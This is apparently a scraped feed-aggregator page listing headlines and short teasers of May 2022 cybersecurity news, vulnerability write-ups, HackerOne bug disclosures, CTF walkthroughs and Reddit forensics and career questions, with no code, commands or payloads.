    The Collapse of Algorithmic Stablecoin UST: Perfect Storm or Financial Hunt?
    Terra, formerly the second-largest economy in decentralised finance, failed completely in this unprecedented crypto storm.
    掌数信息 (Zhangshu Information): Four Difficulties in Security Solutions Tailored to the Media Business | Cybersecurity New Forces SOLO Launch Season
    Which aspects of security do media-industry requirements focus on? What security scenarios exist? Which security products are needed?
    Suspected Iranian APT34 Uses New Backdoor in Fresh Attacks on the Jordanian Government
    Malwarebytes discovered a malicious email targeting an official of Jordan's Ministry of Foreign Affairs; analysis attributes the attack to APT34, a group suspected of links to Iran.
    Exclusive! Interpretation of the Draft "Securities and Futures Industry Cybersecurity Management Measures"
    On April 29, 2022, the China Securities Regulatory Commission opened public consultation on the draft Securities and Futures Industry Cybersecurity Management Measures.
    FreeBuf Morning Report | Gaming Giant Blizzard Hit by Another DDoS Attack; Key Canadian Air Force Supplier Hit by Ransomware
    Activision Blizzard, the world's largest game developer and publisher, said on Twitter that its Battle.net service was under DDoS attack.
    [弈合规 Weekly Compliance Class] In Depth! Frequently Reported Issues: Apps That Force, Repeatedly or Excessively Request User Permissions
    Today it is routine for apps to request and use system permissions and collect personal information to deliver business functions.
    Penetration Testing: File Upload Vulnerabilities
    File upload vulnerabilities, as the name suggests, can appear at any functional point that allows file uploads.
    FreeBuf Enterprise Group Discussion | Software Supply Chain Security and SCA in Practice
    Is SCA the best means of addressing supply chain security? What shortcomings remain in practice? How should one choose between SCA and tools such as SAST?
    A Brief Discussion on Defending Against LAPSUS$
    In recent months, a cybercrime group called LAPSUS$ has been in the spotlight.
    Massive Hacking Campaign Compromises Thousands of WordPress Sites
    The campaign injects malicious JavaScript code into WordPress sites to redirect visitors to scam content.
    Analysis Report on a Sample of the Pandora Ransomware
    It spreads mainly through phishing emails, vulnerability exploitation and RDP brute forcing, and uses a RaaS double-extortion strategy.
    FreeBuf Weekly | REvil Ransomware Returns; Costa Rica Declares State of Emergency Over Conti Attack
    REvil ransomware returns, with a new version under active development; a massive hacking campaign compromises thousands of WordPress sites.
    Misconfigured ElasticSearch Servers Expose 579GB of User Website Records
    Two misconfigured ElasticSearch servers together exposed about 359 million (359,019,902) records.
    Mining and Ransomware in One: Eternity Malware Toolkit Spreading via Telegram
    The modular toolkit includes an info-stealer, a cryptominer, a clipper, a ransomware program, a worm spreader and an upcoming DDoS bot; each module is sold separately.
  • Open

    Front-end JS Attack and Defence
    Author: Sangfor 千里目 Security Lab (深信服千里目安全实验室); original link: https://mp.weixin.qq.com/s/QbfUkU0Fj7Bjk--21H2UQA. Introduction: Web crawlers have long been a headache for website maintainers, who must open the door to search engines to improve ranking and attract advertising while also countering malicious crawlers so that data is not illegally harvested or even sold. This has given rise to the long-running battle between crawlers and anti-crawler measures. Crawler development has progressed from simple scripts to PhantomJS, ...
    CVE-2022-21907 HTTP Protocol Remote Code Execution Vulnerability Analysis Summary
    Author: yyjb@360 Advanced Offence and Defence Lab; original link: http://noahblog.360.cn/cve-2022-21907-httpxie-yi-yuan-cheng-dai-ma-zhi-xing-lou-dong-fen-xi-zong-jie/. Background: In CVE-2021-31166, the previous HTTP remote code execution vulnerability of 2021, the limited lifetime of the UAF object made it seem unlikely that in practice...
    CVE-2021-34535 RDP Client Vulnerability Analysis
    Author: yyjb@360 Advanced Offence and Defence Lab; original link: http://noahblog.360.cn/cve-2021-34535-rdpke-hu-duan-lou-dong-fen-xi/. Background: Among the patches Microsoft released on Patch Tuesday in August 2021 were two RCE vulnerabilities of interest to us; the other one is CVE-2021-34535, a code execution vulnerability in the RDP client. In modern Windows systems the RDP client is not only...
    CVE-2021-26432 NFS ONCRPC XDR Driver Remote Code Execution Vulnerability Verification
    Author: yyjb@360 Advanced Offence and Defence Lab; original link: http://noahblog.360.cn/untitled-2/. Background: Two fairly serious vulnerabilities from August 2021 deserve attention: the NFS ONCRPC XDR Driver remote code execution vulnerability CVE-2021-26432 and the RDP client remote code execution vulnerability CVE-2021-34535. Our aim is to analyse whether these potentially high-impact vulnerabilities can easily be ... in real-world scenarios
  • Open

    Nuclei – Community Powered Vulnerability Scanner
    Article URL: https://nuclei.projectdiscovery.io/ Comments URL: https://news.ycombinator.com/item?id=31364433 Points: 1 # Comments: 0

  • Open

    Harmful Help: Analyzing a Malicious Compiled HTML Help File Delivering Agent Tesla
    We analyze a malicious compiled HTML help file delivering Agent Tesla, following the chain of attack through JavaScript and multiple stages of PowerShell. The post Harmful Help: Analyzing a Malicious Compiled HTML Help File Delivering Agent Tesla appeared first on Unit42.
  • Open

    CVE-2022-27778: curl removes wrong file on error
    Internet Bug Bounty disclosed a bug submitted by nyymi: https://hackerone.com/reports/1565623 - Bounty: $2400
    CVE-2022-27782: TLS and SSH connection too eager reuse
    Internet Bug Bounty disclosed a bug submitted by nyymi: https://hackerone.com/reports/1565624 - Bounty: $2400
    [CVE-2020-3452] Unauthenticated file read in Cisco ASA
    U.S. Dept Of Defense disclosed a bug submitted by ghostxsec: https://hackerone.com/reports/1555015
    [CVE-2020-3452] Unauthenticated file read in Cisco ASA
    U.S. Dept Of Defense disclosed a bug submitted by ghostxsec: https://hackerone.com/reports/1555021
    CVE-2020-3187 - Unauthenticated Arbitrary File Deletion
    U.S. Dept Of Defense disclosed a bug submitted by ghostxsec: https://hackerone.com/reports/1555027
    CVE-2020-3187 - Unauthenticated Arbitrary File Deletion
    U.S. Dept Of Defense disclosed a bug submitted by ghostxsec: https://hackerone.com/reports/1555025
    SQL Injection on https:///
    U.S. Dept Of Defense disclosed a bug submitted by cdl: https://hackerone.com/reports/232378
    SQL Injection on
    U.S. Dept Of Defense disclosed a bug submitted by cdl: https://hackerone.com/reports/277380
    Storage of old passwords in plain text format
    Recorded Future disclosed a bug submitted by subuganz: https://hackerone.com/reports/1549217 - Bounty: $750
  • Open

    B1txor20 Malware Exploiting Log4j Vulnerability
    Article URL: https://socradar.io/b1txor20-malware-exploiting-log4j-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=31358378 Points: 1 # Comments: 1
  • Open

    AI Can Write Code Like Humans — Bugs and All
    New tools that help developers write software also generate similar mistakes. Continue reading on Medium »
    How To Handle The Aftermath Of A Cyber Attack
    Once a breach or an attack happens, the company should try to resolve the  issue in 30 days or less. During that time, the team should… Continue reading on Medium »
    Passive/Active Information Gathering: Subdomain Enumeration
    This post is design to share some of the information I’ve learned while working through the Information Gathering- Web Edition module in… Continue reading on Medium »
    Xml External Entity Web Application Vulnerability : Mechanisms Part
    XML external entity attacks (XXEs) are fascinating vulnerabilities that target the XML parsers of an application. XXEs can be very… Continue reading on Medium »
    Azuro Launches a $30,000+ Bug Bounty on Immunefi
    Azuro has launched a bug bounty on web3’s leading bug bounty platform Immunefi, with hackers being rewarded a maximum bounty of $21,500… Continue reading on Medium »
  • Open

    War in Ukraine / May 11
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    My service for spying on Telegram users…
    Today I wanted to tell you about one of my developments — “Telegram Deanonymizer”. This development allows you to identify anonymous… Continue reading on Medium »
    The Moonshot Threat Bulletin — at a glance
    Moonshot’s Threat Bulletin is a new monthly insights service providing an overview of the key events, themes and narratives discussed by… Continue reading on Medium »
    Operation Galaxios Writeup
    Operation Galaxios is an Open Source Intelligence (OSINT) competition, set up by the team over at Hactoria. Each month they release a… Continue reading on Medium »
  • Open

    Web History Using Paladin
    Hello again... I have been using Sumuri Paladin for some time now and I think it is an excellent tool! I've been thinking about its application at scene/in the field and in particular using it to find web history on a target device. I've looked at all of the tools in the toolbox but as someone who is not the strongest with CLI tools I could do with a bit of help. Any advice or suggestions on how to get Web history within Paladin would be awesome thanks! 🙂 submitted by /u/dwaynehicks2179 [link] [comments]
    Bitlocker password request without Bitlocker
    Hello everyone, yesterday I made an EnCase file from a Windows 10 computer with Tableau TX1 (NVMe SSD). If I mount it with FTK Imager as Logical or Physical there's no problem, I can see everything. Everything is fine also if I convert the EnCase file into a VMware machine. If I try to index the EnCase file with Vound W4 (or with Autopsy), it asks me for the BitLocker password, but there isn't any BitLocker inside Windows and Microsoft disk encryption isn't activated. Also, when I made the forensic copy with Tableau TX1, it alerted me that the NVMe SSD was encrypted with BitLocker, but this is not true. The question is: how is it possible? How can I recover the BitLocker recovery key after I turn on the VMware machine? submitted by /u/Zipper_Ita [link] [comments]
    Axiom timeline question
    Having some problems for some reason with highlighting a few thousand files in timeline. Can shift and get a few hundred. Right click - export doesn't allow you to select all. Space bar highlights what you have. Any way to grab all of the several thousand files in the timeline? Thanks. submitted by /u/clarkwgriswoldjr [link] [comments]
  • Open

    Developers Day CTF Walkthrough
    Assalamu Alaikum, this is Rehan Mumtaz from NED University. It is my first writeup for a CTF challenges walkthrough. Our team m4lware ended… Continue reading on Medium »
    Invoca Capture the Flag (CTF) 2022
    A perspective from a first-time CTF host, novice penetration tester, and Security professional Continue reading on Medium »
  • Open

    30 GB of horse xrays
    https://www.xrays.horse/examinations/ submitted by /u/Pelicaros [link] [comments]
    Thousands of cute pixel art gifs
    http://www.u.arizona.edu/~patricia/cute-collection/ submitted by /u/Pelicaros [link] [comments]
  • Open

    Zyxel Firewall Unauthenticated Command Inject (CVE-2022-30525)
    submitted by /u/chicksdigthelongrun [link] [comments]
    Hacking Electron Applications - 0x101
    submitted by /u/r0075h3ll [link] [comments]
    Content Security Policy for Dummies
    submitted by /u/r0075h3ll [link] [comments]
  • Open

    SecWiki News 2022-05-12 Review
    CVE-2021-31209 analysis and study by SecIN Community. For more recent articles, visit SecWiki
  • Open

    ICS Security: How to Hack This World
    Let's talk about how to take down industrial control devices.
    FreeBuf Morning Report | Five Eyes countries issue new security advisory; Spanish intelligence chief fired over Pegasus scandal
    With cyberspace confrontation escalating because of the Russia-Ukraine conflict, the US government's concern that Russia could compromise domestic computers through Kaspersky software has intensified.
    National Medical Products Administration releases the "14th Five-Year Plan for Drug Regulatory Cybersecurity and Informatization Construction"
    The Plan states that China must achieve a leap from a major pharmaceutical producer to a pharmaceutical power, which places higher demands on drug review and approval efficiency and on drug safety risk management capability.
    Java Code Auditing: Data Types and Operators (2)
    The main() method is the main method in the class body. The method begins at { and ends at }.
    Potential Threats and Challenges in Supply Chain Cybersecurity
    Recent unusual events such as the Russia-Ukraine conflict, Brexit and supply chain imbalances have brought unprecedented challenges to global supply chains.
    Multiple cybersecurity and law enforcement agencies warn: more and more hackers are targeting MSPs
    Recently, members of the Five Eyes intelligence alliance issued a warning to managed service providers (MSPs) and their customers.
    HP fixes firmware bugs affecting more than 200 models
    HP recently released BIOS updates that fix two severe vulnerabilities affecting a wide range of PC and laptop products.
    New stealthy Nerbian RAT malware emerges
    Security researchers have discovered a new malware called Nerbian RAT that has the ability to evade detection and analysis by researchers.
    REvil ransomware returns, new version under active development
    Researchers analyzed newly discovered samples and found that multiple modified new versions have appeared within a short time, indicating that REvil is once again under active development.
    Operation (Dragon) EviLoong: the electronic party of "borderless" hackers
    This article only shares the attack techniques used by the APT-Q-29 group over a recent period and does not discuss the victim organizations.
    Malicious NPM packages target German companies for supply chain attacks
    On May 11, cybersecurity researchers discovered several malicious packages in the NPM registry that specifically target well-known media, logistics and industrial companies located in Germany for supply chain attacks.
    FreeBuf Morning Report | EU blames Russia for attack on Ukrainian satellite network; REvil ransomware gang returns after six months of silence
    The EU accused Russia of attacking the Ukrainian KA-SAT satellite network operated by Viasat on February 24. The cyberattack caused communication outages in Ukraine and also affected several EU member states.
  • Open

    Disambiguation: Privilege vs. Access vs. Permission
    New to infosec and I feel like these have discrete meanings but are used interchangeably. Any help in defining the vernacular understanding would be appreciated. So specifically, I'm looking for what you think most people think the definition is. Access: an abstraction meaning permissions to access an object (file, image). Privilege: a right granted to an agent [identity] (i.e., a user or a non-people identity) to “do something,” like run a program. Sometimes it's used to define rights that are abnormal, special, or temporary. Permission: a property specifically of an object (file) that delineates which agents are permitted to use the object and what they can do with it (read/modify etc.). So in contrast, access is about getting to objects, privilege is about running stuff, and permissions are the individual configs sitting on an object or agent that tell you what they can/can't do. Thanks for any help... submitted by /u/AreThoseNewSlacks [link] [comments]
  • Open

    Api endpoint- Revealed Transaction Details of about Millions of users
    No content preview

  • Open

    TCU Live: 2022MAY11 (latest release)
    The latest version of "TCU Live" (2022MAY11) has been released. It's running the latest Debian sid packages, Linux 5.17 kernel, and third party packages such as the Tor Browser, checkra1n, apfs-fuse, floss, etc. See the README in the link for more information: https://drive.google.com/drive/folders/0B8zx3qPcj9rJVjJrcnB4aXl1VG8?resourcekey=0-gjI_o4MHtiCvsjet9TCygw&usp=sharing It's built to be fairly lean and extensible and is great for in-house forensics, OSINT, field work, or if you just need to quickly spin up a Linux box. If you are looking for something that'll boot on almost all x86-64 (AMD64) hardware give it a shot and DM me if you have any comments or issues. submitted by /u/atdt0 [link] [comments]
    FTK exif search
    Hi all I am trying to search for specific exif details. Apparently according to FTK 7.4 and beyond you can parse this data and create columns out of it. Well if you can, I can’t work it out at all. I’m after exif that I can clearly see in the exif properties of image files, but how do I search it? Eg: exif.image.imagedescription I’d be perfectly happy with that in a column and all the details in there. Just after some pointers on how I go about sorting the data. Thank you submitted by /u/Cerveza87 [link] [comments]
  • Open

    Ddosify – Simple Load Testing Tool
    submitted by /u/binaryfor [link] [comments]
    URL spoofing in Box, Google, and Zoom
    submitted by /u/rsobers [link] [comments]
  • Open

    Go 1.18 Stabilizes Generics, Fuzzing, Multi-Module Support,Improves Performance
    Article URL: https://www.infoq.com/news/2022/03/go-1-18-stable/ Comments URL: https://news.ycombinator.com/item?id=31346891 Points: 5 # Comments: 0
    Earn $200K by fuzzing for a weekend: Part 1
    Article URL: https://secret.club/2022/05/11/fuzzing-solana.html Comments URL: https://news.ycombinator.com/item?id=31346190 Points: 43 # Comments: 3
  • Open

    How encrypted is the reddit mobile app?
    I am using the reddit mobile app on Android. What can my Internet provider or the owner of the WLAN I am currently connected to see? 1. The subreddits I am visiting? 2. The subreddits I am following? 3. The posts I am up/down voting and saving? 4. The posts I am making myself (like this one)? I don't know much when it comes to networking and the technology behind it, so please explain so that even a non-professional like me understands this. Thank you! submitted by /u/gentleXenomorph [link] [comments]
    McAfee Endpoint Security Policies
    Hi there. Are there people here who work with McAfee ENS TP/ATP? I don't really see a workflow on how to tune ENS policies: whitelist noise events or understand where I can turn on the "Block" status of a policy. I have a lot in "Report Only" status, but this is very insecure. And it's hard to understand the context of events, because there can be up to 150K events per day. Basically, I'm worried about putting Block, because there can be an impact on the business. Perhaps someone knows some resources where I can read best practices? For example, a list of programs that can be whitelisted, or which policies can be (or are highly recommended to be) put in the Block status. submitted by /u/athanielx [link] [comments]
    Where can I post my services?
    I have been trying to get a job as a security analyst, but they all require a secret clearance. Where can I post my services as a Cyber Security Analyst? Basic contracts like incident handling and forensics. submitted by /u/theRunAroundGroup [link] [comments]
    Personal favorite VPN
    I've been shopping around and looking for a new VPN provider; curious which ones you all like and why? submitted by /u/Durza44 [link] [comments]
    Best intro cert or training?
    I'm a 15 year professional with 5-years of IT experience directly in project and program management. I'm about to take on a program role in cyber security for my company and was hoping to get feedback on crash course training or entry level certs I should be looking at to familiarize myself with the technical side. I currently hold certs with PMI and SAFe... Any recommendations or general tips? submitted by /u/aryding [link] [comments]
  • Open

    A Detailed Guide on Rubeus
    Introduction Rubeus is a C# toolkit for Kerberos interaction and abuses. Kerberos, as we all know, is a ticket-based network authentication protocol and is used The post A Detailed Guide on Rubeus appeared first on Hacking Articles.
  • Open

    Remote kernel heap overflow
    PlayStation disclosed a bug submitted by m00nbsd: https://hackerone.com/reports/1350653 - Bounty: $10000
    CVE-2022-30115: HSTS bypass via trailing dot
    curl disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1557449
    CVE-2022-27780: percent-encoded path separator in URL host
    curl disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1553841
    SQL injection via vulnerable doctrine/dbal version
    Nextcloud disclosed a bug submitted by nickvergessen: https://hackerone.com/reports/1390331
    CVE-2022-27782: TLS and SSH connection too eager reuse
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1555796
    Account takeover via Google OneTap
    Priceline disclosed a bug submitted by badca7: https://hackerone.com/reports/671406 - Bounty: $1500
    CVE-2022-27779: cookie for trailing dot TLD
    curl disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1553301
    CVE-2022-27778: curl removes wrong file on error
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1553598
    Certificate authentication re-use on redirect
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1563061
  • Open

    120k Email Credential Leaks | Plain Passwords
    It’s been a while since my last article published here on Medium, but this article that I'm going to share with you is related to an Email… Continue reading on Medium »
    War in Ukraine / May 10
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
  • Open

    TryHackMe - Red Team OPSEC
    Hello Everyone. In this blog let’s see how to solve Red Team OPSEC room in TryHackMe. Continue reading on Techiepedia »
    The MITRE ATT&CK Framework
    In this blogpost, I’ll try my best to give you a very basic idea of what MITRE ATT&CK framework is and why it is the need of the hour in… Continue reading on Medium »
  • Open

    DigitalOcean mitigated the AMD vulnerability CVE-2021-26339
    Article URL: https://www.digitalocean.com/blog/digitalocean-mitigated-the-amd-vulnerability-cve-2021-26339 Comments URL: https://news.ycombinator.com/item?id=31342031 Points: 1 # Comments: 0
  • Open

    SecWiki News 2022-05-11 Review
    Meta-learning: Teaching Machine Learning to Learn by ourren; Enterprise Security Construction: An All-Round View of Asset Management by ourren; Analysis and Demonstration of the New eBPF Backdoor boopkit by ourren; F5 BIG-IP Unauthenticated RCE (CVE-2022-1388) Analysis by ourren; Commit Level Vulnerability Dataset by ourren; Satellite Internet Development and Information Security Trends by ourren; Experience Sharing and Journey of Top-Conference Papers: Aspire to Scale the Peaks, Persist in Pursuing Excellence by ourren. For more recent articles, visit SecWiki
  • Open

    Java Code Auditing: Basic Array Operations (3)
    An array is a container that can store primitive types or reference types; the type of the stored data must be consistent.
    Setting a record, UK cyber security centre sends 33 million alerts to the public
    Recently, the UK National Cyber Security Centre released a report stating that it sent more than 33 million alerts to organizations that had previously registered for its Early Warning service.
    Researchers discover a new phishing-as-a-service: Frappo
    Frappo, offered as phishing-as-a-service, lets cybercriminals generate convincing phishing pages that mainly target online banking, e-commerce and online services to steal customer data.
    Microsoft fixes new NTLM zero-day vulnerability in all Windows versions
    Microsoft recently addressed an actively exploited Windows LSA zero-day vulnerability.
    During Russia's Victory Day, hackers broadcast anti-war messages on TV programs
    During Russia's Victory Day, some domestic TV stations suffered cyberattacks; after gaining access, the hackers published anti-war messages.
    Happycorp:1 Vulnhub Target Machine Walkthrough
    A Vulnhub target machine, covering the full penetration test process of the machine. The description is detailed and specific, suitable for learning and practice.
  • Open

    [Security Advisory] Microsoft May 2022 Patch Tuesday fixes multiple high-risk vulnerabilities
    Recently, Microsoft released its May 2022 security patches, fixing 75 vulnerabilities across 36 Microsoft products, notably including 3 "0day" vulnerabilities, involving Windows and Windows components, Visual St...
  • Open

    11 Essential Tools for Java Developers
    No content preview
    PWN101 Walkthrough | TryHackMe
    No content preview
    Cryptography essential for H4CK3R and CTF player 0x1(encoding).
    No content preview
  • Open

    IDOR exposes monetization status of any page’s video in Creator Studio.
    During testing I’ve found that the “variables=%7B%22id%22%3A%22videoID%22%7D” parameter is vulnerable to IDOR. The vulnerability occurs when… Continue reading on Medium »
    Creator Studio’s api endpoint is vulnerable to IDOR, exposes “p40_earnings_usd”:$$$
    During my testing I tried to test all queries by changing PageIDs. Moreover, one of the queries is vulnerable to IDOR. It was a query named… Continue reading on Medium »
    Click for it
    Click to find vulnerability Continue reading on Medium »
    Improper Handling of Undefined Parameters [CWE-236] — The Hacktivists
    Improper Handling of Undefined Parameters describes a case when an application uses an undefined parameter, field, or argument. Continue reading on Medium »
    Incorrect Default Permissions [CWE-276] — The Hacktivists
    Incorrect Default Permissions weakness describes a case where software sets insecure permissions to objects on a system. Continue reading on Medium »
    Cross-Site Scripting — XSS [CWE-79] — The Hacktivists
    Cross-Site scripting or XSS is a weakness that is caused by improper neutralization of input during web page generation. Continue reading on Medium »
    Wombat’s Bug Bounty Program with Immunefi — Earn up to $500,000!
    Wombat’s goal is to deliver you the best stableswap in existence. That wouldn’t be possible without making the safety of our users’ funds… Continue reading on Wombat Exchange »
  • Open

    Diving into .NET WEB
    Author: Knownsec 404 Lab Longofo Date: 2022-05-11 Not long ago I got an assignment involving a .NET target. For a while Exchange kept having vulnerability after vulnerability, and I had always wanted to study .NET-related things systematically; now that I have run into it, I am taking the chance to catch up. There isn't much introductory material for .NET WEB to be found, or it really isn't suited for beginners, and most experienced experts go straight into deserialization or vulnerability analysis. Fortunately there's an expert in the department, @HuanGMz, who has worked with .NET and gave me a hand, so compared with having no...
  • Open

    compost
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Advice regarding career opportunities living in S.A.
    Hello everyone! I'm fairly new to the community, but I'm glad to see questions get taken seriously here. I'm a pentester, almost 4 years of experience performing web and mobile application pentesting, but mainly focused on internal infrastructure assessments (Active Directory pentest with multiple forests, Red Team exercises, pivoting and accessing segmented networks) along with experience in Incident Response and Threat Hunting projects (basic knowledge in ELK stack, Carbon Black Response, Darktrace and basic Crowdstrike, automating tasks with Powershell/Bash) along with the capability to coordinate activities with clients and present results to both technical and executive staff. I have a bachelor's degree in System's engineering (that's how the career is called here for some reason,…
    Good questions to ask the Cybersecurity Analyst I I'll replace (as someone new to Cybersecurity field)
    I have the opportunity to land a Cybersecurity Analyst I position, but don't really have much, if any, knowledge of the position/field (they'll train). What questions should I ask when I get to have a casual talk with the team member (non-manager) who I'd be replacing? From the little knowledge I have so far, I think I would set my long-term security goals towards Cloud Security or DevSecOps. I have some interest in Cloud (the company uses AWS and some Azure), and have no issues with doing programming/scripting, but just don't want to focus on it. From what I gathered from the job description, I'll be doing vulnerability scanning, risk/security assessments of databases/apps/servers/desktops/network devices, monitoring the SIEM, helping administer endpoint protection software, working on reports and planning, etc. My questions so far include: what does a typical day look like? How's on-call? Tools used? Do you think this job prepared you well for future jobs in cybersecurity? Pretty much looking for questions to give me an idea of what to expect, and how this will impact the rest of my career. Thank you. submitted by /u/43t20a [link] [comments]
    .shd and .spl files
    Came across these files on a print server under (C:\Windows\System32\spool\PRINTERS). Can you re-print these files or view these files through some software, to see what they were? I tried copying them to another machine to see if I can reprint them from the same directory. I’m trying to make a case to the admins to remove these files if they pose a security/privacy issue. submitted by /u/Yahweh03-08 [link] [comments]
    Compliance Queries
    Hey, I know that there's a big focus on SaaS companies vulnerability regarding data security. If you have any questions regarding SOC 2 and ISO 27001 compliance. I would love to answer any questions below. I've been speaking to quite a few people within this domain and there seems to be a lot of confusion regarding the subject matter. I'm happy to answer any questions that you might have. *For context purposes, I work for a start up called Scytale AI which focuses on SOC 2 compliance (this is purely for context and credibility purposes, not for promotional purposes). submitted by /u/Thecomplianceexpert [link] [comments]
    Completed my GCIH today!
    I'm very excited as this was my first SANS certification. So, curious to know, what should I do next? I'm planning on doing the Pentest+ because I received a free voucher, but SANS has so many options. I'm currently 5 years into my security career. I've done mostly SOC and SecOps work with some time in ProServices and did the SE thing. It wasn't what I planned, exactly, but I've learned tons along the way. I'm completely open to suggestions. What else is out there, friends? submitted by /u/iam0r0r0 [link] [comments]
    Which password manager would work within a 1500ish employee company with office & Mobile workers (engineers) best?
    Hi, if hypothetically a password manager would be implemented within a business of this size and nature, focusing on the strength of the passwords, being able to reset passwords and/or IT being able to securely reset for users and hand over the password manager? As mobile workers/engineers only have a tablet and don’t always remember the passwords they set and need resetting often (how to automate it), what would it be and why? Also factoring in cost, as the company may not be fully on board with shelling out too much. If there’s anything I’ve missed, I appreciate the questions I can answer. Thanks :) submitted by /u/thelaw281 [link] [comments]
  • Open

    ETH Amsterdam — Hats hits the road
    Seven years ago, Amsterdam hosted one of the first ever international Ethereum conferences. Our OG CTO, Shay Zluf, was a keynote speaker… Continue reading on Medium »
    RCE via Dependency Confusion
    Hey there, I am Samrat Gupta aka Sm4rty, a Security Researcher and a Bug Bounty Hunter. In this Blog I will be sharing my recent finding… Continue reading on System Weakness »
    RCE via Dependency Confusion
    Hey there, I am Samrat Gupta aka Sm4rty, a Security Researcher and a Bug Bounty Hunter. In this Blog I will be sharing my recent finding… Continue reading on Medium »
    Business Logic Vulnerabilities (easy hit) Bug-Bounty
    Hello Cybersecurity Researchers, Continue reading on Medium »
    UniLend Finance moving towards Omnis Testnet with Completion of Bug Bounty
    UniLend Omnis, the upcoming new version for Lending and Borrowing of every ERC20 asset, sets another milestone and moves very close to… Continue reading on Medium »
    ResolveURI RXSS Imperva Waf Bypass
    Hi, Asslam-o-Alaikum Continue reading on Medium »
    Announcing the SynFutures V2 Testnet Bug Bounty Program
    We recently announced that our V2 testnet is now open and available for anyone to use and test! Continue reading on SynFutures »
  • Open

    Resources for important logs companies should be capturing?
    Newer to the field, and don't know much about what specific logs past the basics companies should be capturing. Logs coming from VPNs, Routers, Firewalls, Windows, etc. Logs related to AWS and Azure. Any thoughts? submitted by /u/haloman882 [link] [comments]
    Lateral movement diagrams
    How is your team displaying lateral movement for a report? Are you using Visio, Maltego, PowerPoint or something else? submitted by /u/purpleteamer24 [link] [comments]
    How do I view a file using a sleuth kit command?
    Hi everyone! Trying out sleuthkit for a school project and I'm stuck on one thing. There are questions where I am expected to, for example, "see the colour of an animal in a jpg file" or "tell what's spinning in an mp4 file". Tried to figure it out by myself but I have no clue anymore how to run and view a jpg or mp4 file. Could someone help me out? Thanks! submitted by /u/ahmedmourad22 [link] [comments]
    XWAYS File System image
    Hey guys, I hope everyone is well! It’s been a while. Does anyone have a small image with the XWFS/XWFS file system? Or possibly able to make one? I don’t have an X-Ways license myself so cannot create a simple image with the X-Ways proprietary file system. submitted by /u/SecrectSoc [link] [comments]
    Finding evidence of email tampering
    Hi folks, Sorry if this is not allowed, but I would appreciate any advice. Is there any way to determine if an outlook message has had attachments removed from it? I have a copy of the original .msg file that contains some attachments, but I need to determine if additional attachments were removed (with the remove attachments option, for example) before the file was sent to me. An examination of the header just shows: X-MS-Has-Attach: yes but doesn't indicate if any were removed, as far as I can tell. Is it possible to see in the header or other part of the file a list of the attachments, or at least the number of attachments? submitted by /u/mercsal [link] [comments]
  • Open

    Certifried: Active Directory Domain Privilege Escalation (CVE-2022-26923)
    submitted by /u/ly4k_ [link] [comments]
    Learning Linux kernel exploitation - Part 2 - CVE-2022-0847 (DirtyPipe)
    submitted by /u/0x00rick [link] [comments]
    Diving into Pre-Created computer accounts in Active Directory
    submitted by /u/oddvarmoe [link] [comments]
  • Open

    Threat Brief: CVE-2022-1388
    CVE-2022-1388 is a critical vulnerability that needs immediate attention. Learn what we've observed in the wild and strategies for mitigation. The post Threat Brief: CVE-2022-1388 appeared first on Unit42.
  • Open

    War in Ukraine / May 9
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    TryHackMe — OhSINT Walkthrough
    Hello, we will be working on the TryHackMe box called “OhSINT”. This is labeled as an easy box and found this box to be useful, as well as… Continue reading on Medium »
    Is Google Spying on Our Gadgets? Now I’ll try to prove…
    Let’s take Russian e-mail to Yandex p12v@yandex.ru. Install it Yandex ID: 24585015. The easiest way to do this is through the bot… Continue reading on Medium »
    EZ Capture The Flag 2022 [Versi Indonesia]
    Write up yang hanya memuat penyelesaian challenge kategori OSINT pada EZ CTF 2022… Continue reading on Medium »
    Yandex Zen haters identification…
    How to identify a hater on the popular Russian site for bloggers Yandex Zen? Continue reading on Medium »
    EZ-CTF by CTF Cafe: OSINT challenges Solves and some lessons
    On May 06th the first CTF organized by CTF Cafe was held with 1,700 registered participants. Our team, the SpaceCows made 72th out of 848… Continue reading on Medium »
  • Open

    Common C Vulnerabilities
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    SecWiki News 2022-05-10 Review
    MySQL 8.0 features: SELECT-less injection by SecIN Community. For more recent articles, visit SecWiki
  • Open

    Introducing pyCobaltHound
    pyCobaltHound is an Aggressor script extension for Cobalt Strike which aims to provide a deep integration between Cobalt Strike and Bloodhound. https://blog.nviso.eu/2022/05/09/introducing-pycobalthound/ submitted by /u/A32AN [link] [comments]
    Diving into pre-created computer accounts
    submitted by /u/oddvarmoe [link] [comments]
  • Open

    Diving into pre-created computer accounts
    I was on an engagement where I simply could not elevate privileges, so I had to become creative and look deep into my old bucket (bucket being my head) of knowledge, and this resulted in some fun stuff. I had found that the client had a vulnerable certificate template also known as ESC1 that allowed... The post Diving into pre-created computer accounts appeared first on TrustedSec.
  • Open

    FreeBuf Morning Report | Hackers broadcast anti-war videos on Russia's parade day; hackers hide malware in Microsoft event logs
    Right during Russia's military parade, the TV program listing system was hacked and the parade program was replaced with anti-war messages; the attack affected several major online TV services.
    Exploit developed for critical RCE vulnerability in F5 BIG-IP products
    Global cybersecurity firm Positive Technologies has developed exploit code for the CVE-2022-1388 vulnerability in F5 BIG-IP products.
    Radio Security Attack and Defense: GPS Location Hijacking
    Radio security attack and defense: GPS location hijacking.
    Lao Zhao on Security series: Scraping UNICOM FocalPoint data and reflections on secure programming
    FocalPoint enables product and portfolio management based on market demand and business goals.
    Xiaoyou Technology: Five Risks Troubling Cloud-Native Security | Cybersecurity New Forces SOLO Launch Season
    Where is the direction for cloud-native security risk management and security architecture design? Let Xiaoyou's technical director tell you!
    After the Conti attack, Costa Rica declares a state of emergency
    After multiple government agencies were hit by cyberattacks from the Conti ransomware group, Costa Rican President Rodrigo Chaves declared a national state of emergency.
    CERT-UA warns of malicious spam spreading the Jester info-stealer
    The Computer Emergency Response Team of Ukraine (CERT-UA) detected a malicious spam campaign.
    Analysis of "Transparent Tribe" attack campaigns against India using smuggling-intelligence lures
